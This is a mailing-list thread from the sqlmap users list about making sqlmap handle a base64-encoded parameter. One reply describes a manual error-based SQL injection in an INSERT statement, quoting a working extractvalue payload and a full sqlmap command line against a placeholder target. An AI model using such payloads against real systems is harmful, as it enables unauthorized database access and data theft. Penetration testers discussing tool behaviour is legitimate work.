Miroslav, I previously exploited this manually. The injection occurs in the mysql INSERT statement. If the statement is invalid, we get an error message in html comments like so:
<!--You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''lalalaa))) or'')' at line 1--> Which then is exploitable using some well documented methods such as appending string like this: ' or extractvalue(1,concat(0x7e,(SELECT user()))) or' which gives us a nice error: <!--XPATH syntax error: '~root@localhost'--> Anyhow, I got halfway there with the following string: sqlmap -u ' https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337' --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080 sqlmap sends correctly encoded test vectors, but it doesn't send the correct initial URL stability check vector: 1st request URL: https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337 2nd request URL: https://target/script.php? data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D Also none of the test vectors seem to trigger an error response. I tried with --risk=3 with no avail. version: 1.0-dev-1ef2c40 -- Konrads Smelkovs Applied IT sorcery. On 30 October 2014 13:12, Miroslav Stampar <miroslav.stam...@gmail.com> wrote: > Hi. > > In your case I would do this: > > 1) Decode original base64 value and give it to the sqlmap in decoded form > (e.g. id=123 instead of original id=313233) > 2) Use --tamper=base64encode > > Kind regards, > Miroslav Stampar > > On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <konr...@smelkovs.com> > wrote: > >> Hello, >> >> I am writing a small modification which would allow to tamper/decode >> variables in the request? >> As I understand that the parameters are decoded/parsed into a dict >> after option.py:2323 (parseTargetDirect()), but where can I access the >> full, parsed dict of the get/post/cookie values? >> >> (specifically I have a base64 encoded string as a parameter and to >> insert the payload, the parameter must be base64-decoded, injected and >> then encoded back) >> >> >> -- >> Konrads Smelkovs >> Applied IT sorcery. >> >> >> ------------------------------------------------------------------------------ >> _______________________________________________ >> sqlmap-users mailing list >> sqlmap-users@lists.sourceforge.net >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > http://about.me/stamparm >
------------------------------------------------------------------------------
_______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
